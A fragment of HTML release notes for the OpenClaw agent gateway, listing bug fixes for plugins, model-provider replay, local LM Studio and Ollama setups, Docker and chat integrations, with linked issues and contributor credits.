<li>CLI/plugins: stop security-blocked plugin installs from retrying as hook packs, so normal plugin packages report the scanner failure without a misleading "not a valid hook pack" follow-up. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206381395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61175/hovercard" href="https://github.com/openclaw/openclaw/issues/61175">#61175</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236769831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64102" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64102/hovercard" href="https://github.com/openclaw/openclaw/pull/64102">#64102</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KonsultDigital/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KonsultDigital">@KonsultDigital</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziyincody/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziyincody">@ziyincody</a>.</li>
<li>Agents/Anthropic: strip stale trailing assistant prefill turns from outbound replay so context-engine short circuits cannot send unsupported assistant-prefill payloads to provider APIs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332888910" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72556/hovercard" href="https://github.com/openclaw/openclaw/issues/72556">#72556</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Veda-openclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Veda-openclaw">@Veda-openclaw</a>.</li>
<li>Agents/Google: strip stale trailing assistant/model prefill turns from Gemini outbound replay so Google Generative AI requests end with a user turn or function response. Follow-up to <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332888910" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72556/hovercard" href="https://github.com/openclaw/openclaw/issues/72556">#72556</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Veda-openclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Veda-openclaw">@Veda-openclaw</a>.</li>
<li>Control UI/Dreaming: require explicit confirmation before applying restart-impacting Dreaming mode changes, with restart warning copy and loading feedback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233221234" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63804" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63804/hovercard" href="https://github.com/openclaw/openclaw/issues/63804">#63804</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233286540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63807/hovercard" href="https://github.com/openclaw/openclaw/pull/63807">#63807</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bbddbb1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bbddbb1">@bbddbb1</a>.</li>
<li>CLI/agent: mark Gateway-to-embedded fallback runs with <code>meta.transport: "embedded"</code> and <code>meta.fallbackFrom: "gateway"</code> in JSON output, and make the terminal diagnostic explicit so scripts and operators can distinguish fallback runs from Gateway runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327249504" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71416" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71416/hovercard" href="https://github.com/openclaw/openclaw/issues/71416">#71416</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Agents/tools: normalize <code>null</code> or missing tool-call arguments to <code>{}</code> for parameterless object schemas before Pi validation, so empty-argument tools run instead of failing argument validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333066551" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72587/hovercard" href="https://github.com/openclaw/openclaw/issues/72587">#72587</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Agents/subagents: clear active embedded-run state before terminal lifecycle events so post-completion cleanup no longer treats finished child runs as still active and skips archive or announcement bookkeeping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309345615" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70187" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70187/hovercard" href="https://github.com/openclaw/openclaw/pull/70187">#70187</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>CLI/update: keep the automatic post-update completion refresh on the core-command tree so it no longer stages bundled plugin runtime deps before the Gateway restart path, avoiding <code>.24</code> update hangs and 1006 disconnect cascades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333693515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72665/hovercard" href="https://github.com/openclaw/openclaw/issues/72665">#72665</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sakalaboator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sakalaboator">@sakalaboator</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/He-Pin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/He-Pin">@He-Pin</a>.</li>
<li>Control UI: make explicit Reload Config actions discard stale local config edits while passive refreshes and failed-save recovery keep pending drafts intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042433661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40352" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40352/hovercard" href="https://github.com/openclaw/openclaw/issues/40352">#40352</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042843645" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40443" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40443/hovercard" href="https://github.com/openclaw/openclaw/pull/40443">#40443</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/realmikechong-dotcom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/realmikechong-dotcom">@realmikechong-dotcom</a>.</li>
<li>Agents/Bedrock: stop heartbeat runs from persisting blank user transcript turns and repair existing blank user text messages before replay, preventing AWS Bedrock <code>ContentBlock</code> blank-text validation failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333504705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72640" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72640/hovercard" href="https://github.com/openclaw/openclaw/issues/72640">#72640</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333358856" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72622" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72622/hovercard" href="https://github.com/openclaw/openclaw/issues/72622">#72622</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/goldzulu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/goldzulu">@goldzulu</a>.</li>
<li>Agents/LM Studio: promote standalone bracketed local-model tool requests into registered tool calls and hide unsupported bracket blocks from visible replies, so MemPalace MCP lookups do not print raw <code>[tool]</code> JSON scaffolding in chat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258167996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66178" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66178/hovercard" href="https://github.com/openclaw/openclaw/issues/66178">#66178</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/detroit357/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/detroit357">@detroit357</a>.</li>
<li>Local models: warn when an assistant reply looks like a tool call but the provider emitted plain text instead of a structured tool invocation, making fake/non-executed tool calls visible in logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110625662" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51332" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51332/hovercard" href="https://github.com/openclaw/openclaw/issues/51332">#51332</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/emilclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/emilclaw">@emilclaw</a>.</li>
<li>Local models: accept persisted non-secret local auth markers for private-LAN custom OpenAI-compatible providers, so LAN Ollama configs no longer fail with missing auth when <code>ollama-local</code> is saved as the key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4094215279" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49736" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49736/hovercard" href="https://github.com/openclaw/openclaw/issues/49736">#49736</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/charles-zh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/charles-zh">@charles-zh</a>.</li>
<li>TUI/local models: treat visible gateway client labels such as <code>openclaw-tui</code> as the current requester session for session-aware tools, so Ollama tool calls no longer fail by resolving the UI label as a session id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4260076318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66391/hovercard" href="https://github.com/openclaw/openclaw/issues/66391">#66391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kickingzebra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kickingzebra">@kickingzebra</a>.</li>
<li>Local models: route self-hosted OpenAI-compatible model discovery through the guarded fetch path pinned to the configured host, covering vLLM and SGLang setup without reopening local/LAN SSRF probes. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076198483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46359" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46359/hovercard" href="https://github.com/openclaw/openclaw/pull/46359">#46359</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cdxiaodong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cdxiaodong">@cdxiaodong</a>.</li>
<li>Local models: classify terminated, reset, closed, timeout, and aborted model-call failures and attach a process memory snapshot to the diagnostic event, making LM Studio/Ollama RAM-pressure failures easier to prove from stability bundles. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249906273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65551" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65551/hovercard" href="https://github.com/openclaw/openclaw/issues/65551">#65551</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BigWiLLi111/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BigWiLLi111">@BigWiLLi111</a>.</li>
<li>Local models: pass configured provider request timeouts through OpenAI SDK transports and the model idle watchdog so long-running local or custom OpenAI-compatible streams use one timeout knob instead of hitting the SDK's 10-minute default or the 120s idle default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231111693" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63663" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63663/hovercard" href="https://github.com/openclaw/openclaw/issues/63663">#63663</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aidiffuser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aidiffuser">@aidiffuser</a>.</li>
<li>LM Studio: trust configured LM Studio loopback, LAN, and tailnet endpoints for guarded model requests by default, preserving explicit private-network opt-outs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205504518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60994" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60994/hovercard" href="https://github.com/openclaw/openclaw/issues/60994">#60994</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tnowakow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tnowakow">@tnowakow</a>.</li>
<li>Docker/setup: route Docker onboarding defaults for host-side LM Studio and Ollama through <code>host.docker.internal</code> and add the Linux host-gateway mapping to the bundled Compose file, so containerized gateways can reach local providers without using container loopback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289073782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68684" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68684/hovercard" href="https://github.com/openclaw/openclaw/issues/68684">#68684</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289314253" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68702" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68702/hovercard" href="https://github.com/openclaw/openclaw/pull/68702">#68702</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/safrano9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/safrano9999">@safrano9999</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/skolez/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/skolez">@skolez</a>.</li>
<li>Agents/LM Studio: strip prior-turn Gemma 4 reasoning from OpenAI-compatible replay while preserving active tool-call continuation reasoning. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289319395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68704" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68704/hovercard" href="https://github.com/openclaw/openclaw/issues/68704">#68704</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chip-snomo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chip-snomo">@chip-snomo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kailigithub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kailigithub">@Kailigithub</a>.</li>
<li>LM Studio: allow interactive onboarding to leave the API key blank for unauthenticated local servers, using local synthetic auth while clearing stale LM Studio auth profiles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265841731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66937" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66937/hovercard" href="https://github.com/openclaw/openclaw/issues/66937">#66937</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/olamedia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/olamedia">@olamedia</a>.</li>
<li>Plugins/startup/registry: reuse a Gateway <code>PluginLookUpTable</code> and one manifest registry pass across startup plugin IDs, plugin loading, deferred channel reloads, model pricing, read-only channel defaults, capability/provider/media resolution, manifest contracts, extractors, web fallback discovery, owner maps, and cold provider-discovery caches, with new startup-trace timing/count metrics for installed-index, manifest, startup-plan, and owner-map work. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Mattermost: keep direct-message replies top-level by suppressing reply roots for DM delivery while preserving channel and group thread roots, and derive inbound chat kind from the trusted channel lookup instead of the websocket event channel type. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198774864" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60115" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60115/hovercard" href="https://github.com/openclaw/openclaw/pull/60115">#60115</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144047176" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55186" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55186/hovercard" href="https://github.com/openclaw/openclaw/pull/55186">#55186</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331558573" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72305" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72305/hovercard" href="https://github.com/openclaw/openclaw/pull/72305">#72305</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333662921" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72659" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72659/hovercard" href="https://github.com/openclaw/openclaw/pull/72659">#72659</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195267865" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59758/hovercard" href="https://github.com/openclaw/openclaw/issues/59758">#59758</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197726401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59981" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59981/hovercard" href="https://github.com/openclaw/openclaw/issues/59981">#59981</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195702082" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59791" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59791/hovercard" href="https://github.com/openclaw/openclaw/pull/59791">#59791</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4168354725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57565" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57565/hovercard" href="https://github.com/openclaw/openclaw/pull/57565">#57565</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jwchmodx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jwchmodx">@jwchmodx</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hnykda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hnykda">@hnykda</a>.</li>
<li>Docker: pre-create <code>/home/node/.openclaw</code> with node ownership and private permissions so first-run Docker Compose named volumes no longer fail startup with EACCES. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081165640" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48072" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48072/hovercard" href="https://github.com/openclaw/openclaw/pull/48072">#48072</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235354201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63959" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63959/hovercard" href="https://github.com/openclaw/openclaw/pull/63959">#63959</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207166215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61279" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61279/hovercard" href="https://github.com/openclaw/openclaw/issues/61279">#61279</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/timoxue/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/timoxue">@timoxue</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeanibarz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeanibarz">@jeanibarz</a>.</li>
<li>CLI/Gateway: treat local restart probe policy closes for connect, exact <code>device required</code>, pairing, and auth failures as Gateway reachability proof without accepting empty, broad standalone token/password/scope/role, or pair-substring 1008 close reasons. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4086431078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48771" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48771/hovercard" href="https://github.com/openclaw/openclaw/issues/48771">#48771</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4086615069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48801" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48801/hovercard" href="https://github.com/openclaw/openclaw/pull/48801">#48801</a>; related <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4228912213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63491/hovercard" href="https://github.com/openclaw/openclaw/issues/63491">#63491</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarsDoge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarsDoge">@MarsDoge</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/genoooool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/genoooool">@genoooool</a>.</li>
<li>Feishu: send outgoing interactive reply payloads as native cards with clickable buttons while preserving text, media, and document-comment fallbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3919571266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/13175/hovercard" href="https://github.com/openclaw/openclaw/issues/13175">#13175</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4177896611" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58298/hovercard" href="https://github.com/openclaw/openclaw/issues/58298">#58298</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080155978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47891" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47891/hovercard" href="https://github.com/openclaw/openclaw/pull/47891">#47891</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Horacehxw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Horacehxw">@Horacehxw</a>.</li>
<li>Process/Windows: decode command stdout and stderr from raw bytes with console-codepage awareness, while preserving valid UTF-8 output and multibyte characters split across chunks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102777975" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50519" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50519/hovercard" href="https://github.com/openclaw/openclaw/issues/50519">#50519</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iready/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iready">@iready</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevinten10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevinten10">@kevinten10</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangyongjie1997/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangyongjie1997">@zhangyongjie1997</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/knightplat-blip/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/knightplat-blip">@knightplat-blip</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heiqishi666/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heiqishi666">@heiqishi666</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slepybear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slepybear">@slepybear</a>.</li>
<li>Bonjour/Windows: hide the bundled mDNS advertiser's Windows ARP shell probe so Gateway startup no longer flashes command-prompt windows. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310157936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70238" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70238/hovercard" href="https://github.com/openclaw/openclaw/issues/70238">#70238</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PratikRai0101/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PratikRai0101">@PratikRai0101</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/infinitypacific/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/infinitypacific">@infinitypacific</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomerpeled/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomerpeled">@tomerpeled</a>.</li>
<li>Agents/bootstrap: dedupe hook-injected bootstrap context files by workspace-relative path and store normalized resolved paths so duplicate relative and absolute hook paths no longer depend on the process cwd. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190963394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59344" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59344/hovercard" href="https://github.com/openclaw/openclaw/pull/59344">#59344</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190804191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59319" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59319/hovercard" href="https://github.com/openclaw/openclaw/issues/59319">#59319</a>; related <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162233538" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56721/hovercard" href="https://github.com/openclaw/openclaw/pull/56721">#56721</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162249580" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56725" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56725/hovercard" href="https://github.com/openclaw/openclaw/pull/56725">#56725</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4168683400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57587" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57587/hovercard" href="https://github.com/openclaw/openclaw/pull/57587">#57587</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koen666/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koen666">@koen666</a>.</li>
